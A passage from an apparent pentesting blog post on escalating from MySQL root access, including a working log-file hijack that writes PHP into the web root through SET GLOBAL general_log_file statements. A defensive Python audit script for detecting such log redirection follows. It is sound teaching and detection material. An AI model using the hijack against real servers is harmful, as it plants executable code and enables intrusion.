We compile a MySQL extension (UDF) that runs OS commands.
MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this.

3. When into outfile Fails: The Log File Hijack

Modern setups block outfile. But we have a Plan B: General Query Log.

For a sysadmin, it’s a tool. For a pentester, it is often the endgame.
If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/hack.php';
SELECT '<?php phpinfo(); ?>';

Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective.

You have root MySQL access, but you are a low-privilege OS user. How do we escalate?
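From the defender's side, the log file hijack above leaves two checkable traces: a log variable pointing into the web root, and the `SET GLOBAL` statement that put it there. The following audit sketch is an added example, not code from the original post; the web roots, script extensions, function names and sample data are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumed web roots and script extensions; adjust for the audited host.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx/html")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
# Matches runtime statements that retarget a server log file.
SET_LOG_RE = re.compile(
    r"SET\s+(?:GLOBAL\s+|@@GLOBAL\.)(general_log_file|slow_query_log_file)"
    r"\s*=\s*(['\"])(.+?)\2", re.IGNORECASE)

def risky_log_path(path):
    """Return the reasons a log path is dangerous (empty list if none)."""
    norm = posixpath.normpath(path)  # collapse ../ before comparing
    reasons = []
    if any(norm == r or norm.startswith(r + "/") for r in WEB_ROOTS):
        reasons.append("inside web root")
    if norm.lower().endswith(SCRIPT_EXTS):
        reasons.append("script extension")
    return reasons

def audit_variables(variables):
    """variables: name -> value mapping taken from SHOW GLOBAL VARIABLES."""
    findings = []
    for name in ("general_log_file", "slow_query_log_file"):
        reasons = risky_log_path(variables.get(name, ""))
        if reasons:
            findings.append((name, variables[name], reasons))
    return findings

def scan_statements(lines):
    """Flag logged SET GLOBAL statements that move a log to a risky path."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = SET_LOG_RE.search(line)
        if m and risky_log_path(m.group(3)):
            hits.append((lineno, m.group(1).lower(), m.group(3)))
    return hits

# Constructed sample data (not taken from a real server).
SAMPLE_VARS = {"general_log": "ON",
               "general_log_file": "/var/www/html/hack.php",
               "slow_query_log_file": "/var/lib/mysql/db-slow.log"}
SAMPLE_STATEMENTS = [
    "12 Query SET GLOBAL general_log = 'ON'",
    "12 Query SET GLOBAL general_log_file = '/var/www/html/hack.php'",
    "12 Query SELECT 1"]

if __name__ == "__main__":
    print(audit_variables(SAMPLE_VARS))
    print(scan_statements(SAMPLE_STATEMENTS))
```

Feed `audit_variables` the current server variables on a schedule and `scan_statements` whatever statement or audit log the server already keeps; either hit warrants checking the web root for unexpected files.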
This post is for educational purposes and authorized security testing only.
Published by: Security Tinkerer
Reading time: 6 minutes
The next time you see that blue login screen, remember: it’s not just a database manager. It is often one SQL query away from a root shell. Want more "Hacktricks"? Check out the HackTricks GitHub repo for the ultimate cheat sheets.